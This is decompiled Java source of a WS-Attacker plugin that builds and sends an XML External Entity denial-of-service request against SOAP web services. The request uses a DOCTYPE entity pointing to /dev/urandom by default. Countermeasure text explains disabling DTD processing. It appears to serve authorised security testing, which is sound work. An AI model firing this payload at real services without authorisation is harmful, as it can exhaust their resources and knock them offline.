/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.plugin.dos;

import java.util.HashMap;
import java.util.Map;
import wsattacker.main.composition.plugin.option.AbstractOption;
import wsattacker.main.plugin.option.OptionSimpleVarchar;
import wsattacker.plugin.dos.dosExtension.abstractPlugin.AbstractDosPlugin;
import wsattacker.plugin.dos.dosExtension.option.OptionTextAreaSoapMessage;

public class XmlExternalEntity
extends AbstractDosPlugin {
    private static final long serialVersionUID = 1L;
    private OptionSimpleVarchar optionExternalEntity;

    @Override
    public void initializeDosPlugin() {
        this.initData();
        this.optionExternalEntity = new OptionSimpleVarchar("Path to resource", "\"/dev/urandom\"", "Be carefull with Linux/Windows/Mac system resource differences!", 400);
        this.getPluginOptions().add((AbstractOption)this.optionExternalEntity);
    }

    @Override
    public OptionTextAreaSoapMessage.PayloadPosition getPayloadPosition() {
        return OptionTextAreaSoapMessage.PayloadPosition.BODYLASTCHILDELEMENT;
    }

    public void initData() {
        this.setName("XML External Entity Attack");
        this.setDescription("<html><p>This attack checks whether or not a Web service is vulnerable to the \"XML External Entity\" attack.</p><p>A vulnerable Web service runs out of resources when trying to resolve an external entity.Examples of external entities are:<ul><li>Large files from external servers. This will use up the bandwidth.</li><li>Local files e.g. /dev/random/ on a Linux machine</li></ul></p><p>The external entity is defined in the Document Type Definition (DTD).A detailed description of the attack can be found on <a href=\"http://clawslab.nds.rub.de/wiki/index.php/XML_Remote_Entity_Expansion\">http://clawslab.nds.rub.de/wiki/index.php/XML_Remote_Entity_Expansion</a>.</p><p>The attack algorithm replaces the string $$PAYLOADATTR$$ in the SOAP message below with an attribute that uses the entity that points to the external resource.</p><p>The placeholder $$PAYLOADATTR$$ can be set to any other position in the SOAP message</p><p>The default value for the external source paramter is /dev/null/ and will only work on Linux bases Web services.</p></html>");
        this.setCountermeasures("In order to counter the attack, the DTD-processing (Document Type Definitions) feature has to be disabled completly.\nApache Axis2 1.5.2 is e.g. known to be vulnerable to this attack. Current versions of Apache Axis2 are not vulnerable anymore");
    }

    @Override
    public void createTamperedRequest() {
        String soapMessage = this.getOptionTextAreaSoapMessage().getValue();
        String attribute = "&attackEntity;";
        soapMessage = this.getOptionTextAreaSoapMessage().replacePlaceholderWithPayload(soapMessage, attribute);
        StringBuilder sb = new StringBuilder();
        sb.append("<?xml version=\"1.0\" encoding=\"UTF-8\"?>");
        sb.append("<!DOCTYPE requestType [ <!ENTITY attackEntity SYSTEM " + this.optionExternalEntity.getValue() + ">]>");
        sb.append(soapMessage);
        String soapMessageFinal = sb.toString();
        HashMap<String, String> httpHeaderMap = new HashMap<String, String>();
        for (Map.Entry<String, String> entry : this.getOriginalRequestHeaderFields().entrySet()) {
            httpHeaderMap.put(entry.getKey(), entry.getValue());
        }
        httpHeaderMap.put("Content-Type", "application/xml; charset=UTF-8");
        this.setTamperedRequestObject(httpHeaderMap, this.getOriginalRequest().getEndpoint(), soapMessageFinal);
    }
}

